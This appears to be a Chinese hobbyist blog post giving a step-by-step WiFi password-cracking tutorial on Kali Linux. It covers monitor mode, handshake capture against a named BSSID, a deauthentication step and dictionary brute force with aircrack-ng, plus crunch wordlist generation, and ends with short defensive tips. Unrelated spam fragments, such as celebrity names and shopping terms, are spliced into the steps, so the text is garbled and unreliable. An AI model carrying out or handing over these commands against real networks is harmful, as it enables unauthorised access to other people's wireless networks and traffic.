破解wifi(物理⿊客)
题记
⼤家好啊,我也知道我写⼀堆东西也没啥⼈看,这只是⾃娱⾃乐,但也是鞭策我的⼀种⽅式,也是让我回顾的便捷途径。这些天⼀直看⼤佬讲的挖src实战经验,也没时间记笔记。好⼏个实战我都想实操,奈何⼯具还没到我⼿,⼩⽶wifi刚到,下⼀个就是badusb了,在下个就是vps了,我已经迫不及待的准备把我的靶场与想法实现了。真想体验体验⼀键上线cs的感觉的。物理⿊客也是⿊客(哼)。不断学习,我将会是中国最伟⼤的⿊客(中⼆脸)。是真的,我越来越认为⽹安是我们越来越重视的东西,这东西我们落下美国太多年了,加强⽹安建设⾃我辈开始。
⼀、准备⼯作
1、usb⽆线⽹卡,我买的⼩⽶随⾝wifi,即插即⽤,不⽤安装驱动。
2、vm服务全部开启。户户通安装调试指南
3、kali设为桥接模式,桥接模式依赖的是⽹卡。
⼆、操作步骤
端午五彩绳的意义
1、开启虚拟机,把kali上线。
2、插⼊酷似usb的随⾝wifi。
3、ifconfig看⼀下⽹卡接⼝,名字⼀般是wlan0.
淘宝网达人
4、开启⽆线⽹卡监听模式
airmon-ng start wlan0,之后在查看⽹卡接⼝,发现名字变了。
朱一龙的老婆欧倩怡5、查看周围⽹络
airodump-ng wlan0mon
袁志博疑整容中间这个是⽬标wifi,抓到wifi就Ctrl+c停⽌。这时候需要注意的是此wifi的信道为3,所以我们要把⽹卡监听信道调成3,airodump-ng
wlan0mon -c 3。
6、创建⼀个⽬录,⽤来存放抓到的握⼿包⽂件。
mkdir pojie
7、开始抓包
airodump-ng -c 3 --bssid B8:3A:08:C5:88:71 -w pojie/ wlan0mon 注意:信道不能错,⽂件抓到包后会存在pojie⽬录下,⽣成⼀个-01.cap⽂件。
8、另开⼀个窗⼝进⾏攻击,使链接wifi的设备重连wifi,我们抓取中间包。
9、回到之前窗⼝我们可以看到成功抓到包了。
10、结束掉抓包后开始暴⼒破解。
aircrack-ng -a2 -b B8:3A:08:C5:88:71 -w /usr/share/ pojie/-01.cap
注意:初次使⽤字典需要解压。
霍建华博客gzip -d /usr/share/
或者⾃⼰传⼀个字典去⼲爆密码。
11、破解成功图如下(密码被打马赛克,其实不重要,总不能来我家蹭⽹吧)。
12、关闭⽹卡监听模式,然后就能上⽹了。
airmon-ng stop wlan0mon
三、爆破字典
1、在kali⾥,是默认⾃带了字典的,分别放在下⾯三个⽂件中:/usr/share/wordlist
/usr/share/wfuzz/wordlist
/usr/share/seclists,有⼀个password
2、⽣成⼀个指定⽂件名的密码⽂件,密码长度为1到8位crunch 1 8 123456 -o 
3、⾃⼰⽹上搜集搜集,好字典才是王道。
四、注意事项
1、防⽌这种攻击最简单的⽅法是设置贼复杂贼长的密码;
2、不要使⽤WEP加密⽅式,⾮常容易被破解;
3、监听信道和wifi信道⼀定要保持⼀致。